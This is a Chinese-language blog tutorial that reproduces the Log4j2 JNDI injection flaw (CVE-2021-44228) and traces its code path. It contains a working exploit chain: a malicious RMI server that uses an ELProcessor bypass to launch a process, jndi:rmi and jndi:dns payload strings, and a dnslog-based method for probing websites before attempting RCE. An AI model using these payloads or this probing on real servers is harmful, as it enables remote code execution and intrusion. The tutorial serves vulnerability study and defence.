Log4j2之JNDI注入(CVE-2021-44228)

2023-11-15

前言:

        首先要了解什么是Log4j2,Log4j2是一个Java日志组件,主要用于对日志的记录。

        这次漏洞出现在Log4j2的Lookup功能,使用Lookup可以在日志中添加动态的值。这些变量可以是外部环境变量,也可以是MDC中的变量,还可以是日志上下文数据等。但是这里可以被恶意利用。未经身份验证的远程攻击者可以通过向运行有漏洞的 log4j 版本的服务器发送精心编制的请求来利用此漏洞。精心编制的请求通过各种服务使用 Java 命名和目录接口 (JNDI) 注入,这些服务包括:

  • 轻型目录访问协议 (LDAP)
  • 安全的 LDAP (LDAPS)
  • 远程访问调用 (RMI)
  • 域名服务 (DNS)

        如果有漏洞的服务器使用 Log4j2来记录请求,则该漏洞利用将通过上述服务之一从攻击者控制的服务器请求针对 JNDI 的恶意有效负载。漏洞利用得手可能会造成 RCE。

        目前存在漏洞的Log4j2版本:

        Apache Log4j 2.x >=2.0-beta9 且 < 2.15.0 (2.12.2 版本不受影响)

        另外就是利用中对jdk版本的限制,高版本的java环境远程rce需要绕过。

基础:

        首先我们写个基本的使用Log4j2记录的功能:

package org.example;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.ThreadContext;

public class Log4j2_cve {
    public static final Logger LOGGER = LogManager.getLogger(Log4j2_cve.class);

    public static void main(String[] args) {
        ThreadContext.put("userId", "test");
        LOGGER.error("userId: ${ctx:userId}");
    }
}

        代码功能就是根据上下文,将userId的内容进行输出,这样做的好处就是可以方便对日志的审查,进而更好的分析日志:

但是官方说明允许通过 JNDI 检索变量: 

        这就带来了问题。

复现:

         首先我们编写受攻击服务器代码:

package org.example;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j2_cve {
    public static final Logger LOGGER = LogManager.getLogger(Log4j2_cve.class);

    public static void main(String[] args) {
        LOGGER.error("${jndi:rmi://127.0.0.1:1099/exp}");
    }
}

        代码直接调用rmi访问我们的自己搭建的服务器

        自己搭建的服务器代码:

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Main_poc {
    public static void main(String[] args) throws Exception {
        try{
            Registry registry = LocateRegistry.createRegistry(1099);
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
            ref.add(new StringRefAddr("forceString", "x=eval"));
            ref.add(new StringRefAddr("x", "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));

            ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
            registry.bind("exp", referenceWrapper);
        } catch (Exception e) {
            System.err.println("Server exception: " + e.toString());
            e.printStackTrace();
        }

    }
}

         因为我的jdk版本为1.8,默认trustURLCodebase为false,不能加载远程代码,所以这里采用反射ELProcessor执行elf表达式来绕过限制,或者可以使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具搭建服务器。

        先执行我们自己搭建的服务器,然后执行被攻击端代码,可以看到弹出计算器:

 代码分析:

        这里我们有必要研究下到底为何存在漏洞,首先我们看看漏洞触发的调用栈:

        在传入参数${jndi:rmi://127.0.0.1:1099/exp}重要的几个位置,首先MessagePatternConverter的format方法,这里会匹配是否为${}格式:

         而后进入StrSubstitutor的resolveVariable方法,这里会获取使用的变量解析器,这里可以看到可以使用的解析方式有{date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j},我们这里使用的是jndi:

        而后调用lookup和我们搭建的服务器通信,加载远程代码执行:

         整个的调用逻辑很清晰,就是我们传入${jndi:rmi://127.0.0.1:1099/exp}后会判断格式是否为${},如果是则读取变量的解析方式,当为jndi的时候会调用lookup方法,进而加载我们的恶意代码。

        最后官方的修复方案也是在新版本的2.16.0,Log4j2团队干脆默认禁用掉了JNDI Lookup功能,简单粗暴。

探测方法:

        在我们对网站扫描中,我们要如何发现网站是否存在漏洞,如果我们直接使用rmi或者ldap进行注入,可能由于jdk版本问题或者内部网络环境问题无法得到有效回显,这里我们可以使用DNS协议进行判断:

        被攻击侧代码:

package org.example;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j2_cve {
    public static final Logger LOGGER = LogManager.getLogger(Log4j2_cve.class);

    public static void main(String[] args) {
        LOGGER.error("${jndi:dns://yx796p.dnslog.cn}");
    }
}

        运行后可以看到在远程的dnslog平台已经有了回显:

         这里我们可以使用:${jndi:dns://yx796p.dnslog.cn}  编码后再网页的接口进行测试,当触发了错误或者写日志的代码,就可以成功访问我们的dnslog平台,也就可以判断是否存在漏洞,进而进行下一步攻击最终rce。

后记:

        这里进行下总结,在利用Log4j2的CVE-2021-44228中,我们可以使用JNDI注入,其中我们可以使用rmi或者ldap进行远程rce,我们可以自己搭建服务器,也可以使用工具一建化搭建服务器,但是考虑到被攻击测的版本问题,当版本较高的时候,默认是不能加载我们的远程代码,这时我们可以使用DNS协议根据dnslog的输出判断是否存在漏洞,确定存在后再进行rmi注入,并根据是否执行来判断jdk版本来判断是否需要绕过。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Log4j2之JNDI注入(CVE-2021-44228) 的相关文章

随机推荐

  • 【极验黑科技】文生图大模型在极验人机对抗领域的应用

    自极验于2013年开创性地提出新一代的智能验证码概念开始 就始终在人机对抗领域不停地升级迭代 极验全球首创的 行为式验证 在十多年来 为全球近40万的开发者使用 如小米 新浪微博 东方航空 国家工商局等企业携手极验验证码进行升级 使得现在传
  • Python数据分析之对一个游戏的运营情况进行分析

    Python数据分析之对一个游戏的运营情况进行分析 文章目录 Python数据分析之对一个游戏的运营情况进行分析 一 分析目标 二 数据介绍 三 结论 1 新增用户分析 2 玩家活跃度分析 3 玩家付费情况分析 4 玩家游戏习惯分析 四 详
  • 稳健回归-鲁棒回归

    稳健回归 稳健回归 robust regression 是统计学稳健估计中的一种方法 其主要思路是将对异常值十分敏感的经典最小二乘回归中的目标函数进行修改 经典最小二乘回归以使误差平方和达到最小为其目标函数 稳健回归 robust regr
  • 如何将项目提交到别人的仓库

    大纲 1 在gitee中克隆 clone 别人仓库的代码 首先 进入别人的仓库 点击 克隆 下载 2 在你存放项目的文件夹下克隆你刚刚复制的代码 右键点击Git Clone即可 点击OK 就开始克隆了 克隆成功之后 文件上会出现一个绿色的
  • 了解预训练以及在自编码器中的应用

    预训练是一种机器学习技术 在这种技术中 模型被训练以在标注数据少或不存在的情况下自动从未标记的数据中学习 预训练可以为模型提供先验知识 使其能够在特定任务上更好地泛化 预训练过程通常分为两个阶段 无监督预训练和有监督微调 无监督预训练 模型
  • unity屏幕后处理Bloom优化(光晕)

    前言 前几天看米哈游的技术总监说 崩坏3 的bloom效果的实现是 1 高亮像素过滤 2 向下采样 降采样 3 向上采样 4 将模糊后的图像和原图像混合 经过上面的步骤 能高效的实现bloom效果 常规的bloom是使用 提取高亮 卷积滤波
  • [专利与论文-20]:江苏省南京市2022年电子信息申报操作指南

    1 学时认定 每年公需课不能低于30学时 2 流程
  • elastic search中易并行聚合算法,三角选择原则,近似聚合算法浅析

    1 有些聚合分析的算法 是很容易就可以并行的 比如说max 有些聚合分析的算法 是不好并行的 比如说 count distinct 并不是说 在每个node上 直接就出一些distinct value 就可以的 因为数据可能会很多 es会采
  • DMX512协议是什么 DMX512数字灯光控制系统介绍

    基于DMX512控制协议进行调光控制的灯光系统叫做数字灯光系统 目前 包括电脑灯在内的各种舞台效果灯 调光控制器 控制台 换色器 电动吊杆等各种舞台灯光设备 以其对DMX512协议的全面支持 已全面实现调光控制的数字化 并在此基础上 逐渐趋
  • 74HC595 使用记录 国产UTC品牌

    芯片型号 U74HC595A 数据手册时序图 实际测试时序图 通道1 595的14脚 通道2 595 的11脚 通道3 595 的9脚 结论 U74HC595A 国产 UTC品牌 数据手册与实测数据不一致
  • CentOS 7.9 64位 SCC版安装FastDfs和配置Nginx

    最近练习的项目中需要用到FastDfs 和Nginx 这里记录一下安装和配置过程 个人使用部署过程遇到了很多的坑 准备把过程记下来不然忘了 首先 购买 试用阿里云 CentOS 7 9 64位Scc版系统 进入远程桌面 由于项目较老 所以我
  • 尚硅谷电影推荐系统搭建遇到的问题及知识

    尚硅谷电影推荐系统搭建遇到的问题及知识 Hadoop ES问题 Zookeeper Flume ng Kafka Azkaban 其他 腾讯云Superset问题 需更新数据库用户 登录master节点 cd usr local servi
  • java去掉字符串的逗号_java – 从字符串数组中删除逗号

    我想执行像这样的查询 从 xyz DB 中选择ID test 其中用户在 a b 所以相应的代码就像 String s for String user selUsers s user s 从test中选择ID 其中userId在s中 以下代
  • idea中 关于thymeleaf 变量 在html中 报红 以及控制器 返回页面无法追踪的问题

    html页面thymeleaf 的 变量 报红 无法追踪 controller 无法直接追踪 页面 默认配置前缀 templates 后缀 html 可以正常运行 页面跳转以及变量的传递 就是看着有点不舒服 咋办呢 我无意之间发现的 加入s
  • JVM学习笔记

    目录 垃圾回收器 垃圾回收器分类 按线程数分 按工作模式分 按碎片处理方式分 按工作的内存区间分 GC分类与性能指标 性能指标 吞吐量 性能指标 暂停时间 吞吐量vs暂停时间 垃圾回收器 垃圾回收器发展史 7种经典的垃圾收集器 垃圾回收器的
  • [人工智能-综述-3]:人工智能与硅基生命,人类终将成为造物主

    作者主页 文火冰糖的硅基工坊 https blog csdn net HiWangWenBing 本文网址 https blog csdn net HiWangWenBing article details 119061112 目录 引言
  • 145 - Table ' is marked as crashed and should be repai

    145 Table schoolhelp xyb user is marked as crashed and should be repai 145 表 schoolhelp xyb user 被标记为崩溃 应重新修 修复方式 repair
  • Html CSS学习(六)background-position背景图像的定位

    2019独角兽企业重金招聘Python工程师标准 gt gt gt Html CSS学习 六 background position背景图像的定位 在网页中 会有很多的背景图像与一些小的图标等内容 在初学的时候 为了达到页面的效果 都是将原
  • Spring Boot中如何编写优雅的单元测试

    单元测试是指对软件中的最小可测试单元进行检查和验证 在Java中 单元测试的最小单元是类 通过编写针对类或方法的小段代码 来检验被测代码是否符合预期结果或行为 执行单元测试可以帮助开发者验证代码是否正确实现了功能需求 以及是否能够适应应用环
  • Log4j2之JNDI注入(CVE-2021-44228)

    前言 首先要了解什么是Log4j2 Log4j2是一个Java日志组件 主要用于对日志的记录 这次漏洞出现在Log4j2的Lookup功能 使用Lookup可以在日志中添加动态的值 这些变量可以是外部环境变量 也可以是MDC中的变量 还可以